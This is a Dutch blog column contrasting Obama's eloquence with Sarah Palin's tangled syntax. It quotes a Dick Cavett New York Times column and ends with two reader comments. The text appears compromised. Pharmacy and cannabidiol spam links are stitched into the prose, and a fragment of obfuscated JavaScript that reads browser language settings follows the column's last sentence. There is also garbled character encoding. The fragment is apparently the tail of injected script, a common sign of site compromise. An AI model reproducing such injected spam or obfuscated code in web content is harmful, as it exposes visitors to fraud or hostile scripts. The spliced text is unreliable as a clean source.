Smalend over taal

‘Hij praat eloquent’ zei John steeds maar over Barack.

‘Eloquent’. Het woord alleen al is ‘eloquent’, vond ik. Maar John vond dat hij met het woord Obama goed weergaf: ‘Obama is welbespraakt’. In de campagne werd dat blij overgenomen: Republikeinen spraken smalend over het Obama’s mooipraterij, maar wat had hij nou helemaal voor elkaar gekregen? Nou?

Via een nieuwe vriend die ik in mijn favoriete koffietentje had leren kennen, zat ik ineens bij dr. Fenn op de bank. Een indrukwekkend oude man die in het Witte Huis met Kennedy had gewerkt. ‘En toen werkte er niet 2000 mensen zoals nu’, merkte hij fijntjes op. ‘Ik was Ai??Ai??n van de 25.’

Dr. Fenn had gefrustreerd zitten luisteren naar de smalende opmerkingen over Obama. ‘Eloquent zijn is ontzettend belangrijk’, vond de bejaarde man, die nu nog steeds college geeft aan Harvard. ‘Misschien wel het belangrijkste talent dat een president kan hebben. Als president moet je kunnen discussiAi??ren, overtuigen en onderwijzen. Geloof me, Kennedy was nog niet half zo ver als Obama nu.’

En daar moest ik aan denken toen ik de heerlijk botte column las in The New York Times. Purchase lady era pills Dick Cavett is nu mijn grootste vriend. Want zo eloquent als Obama is, zo on-eloquent is Sarah Palin. Is dat geen woord? Welkom in haar wereld.

http://centrodado.com/buy-cannabidiol-cost/ My concern has been the atrocities there in Darfur and the relevance to me with that issue as we spoke about Africa and some of the countries there that were kind of the people succumbing to the dictators and the corruption of some collapsed governments on the continent, the relevance was Alaskaai??i??s investment in Darfur with some of our permanent fund dollars.

Of zoals vriend Dick het noemt: een zin ‘committed by the serial syntax-killer from Wasilla High’ – onze Palin dus.

Sarah Palin is niet weg te slaan van de televisie. Of zoals Dick het zegt: ‘Something has gone wrong with all (my) three television sets. They will get only Sarah Palin.’ Ze is op post-verliezers en pre-in-2012-wil-ik-alvast-een-voorsprong-hebben-op-Romney-en-Huckabee-toernee.

Met een multi-dollar boekdeal op zak en haar niet van de tv te krijgen smoel zit dat wel goed. Alleen nog even aan haar taal werken. d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Jonkvrouw Jet is 28 en volgde vorig jaar de presidentsverkiezingen in de VS. Nu onderzoekt ze hoe Amerikanen worden geraakt door de economische crisis.

2 Reacties op “Smalend over taal”

  1. [...] Sarah Palin is niet weg te slaan van de televisie. Of zoals Dick het zegt: ‘Something has gone wrong with all (my) three television sets. They will get only Sarah Palin .’ Ze is op post-verliezers en …[Continue Reading] [...]

  2. Wel jammer dat Obama zo’n beetje alles van de autocue opleest. Hij is zichtbaar behoorlijk getraind in het opdreunen van de tekst zodat het lijkt alsof hij uit z’n hart spreekt.

    Maar als je zijn ogen goed beziet, zie je hem lezen terwijl hij voortdurend van links naar rechts op 2 vaste punten focust.

    Op diverse opnames zie je de autocuepanelen staan. En op youtube kun je zien wat er van Obama’s spreken overblijft als zijn teleprompter (usa) uitvalt… Niet veel….

    Youtube: Obama teleprompter

    enjoy!

Laat een bericht achter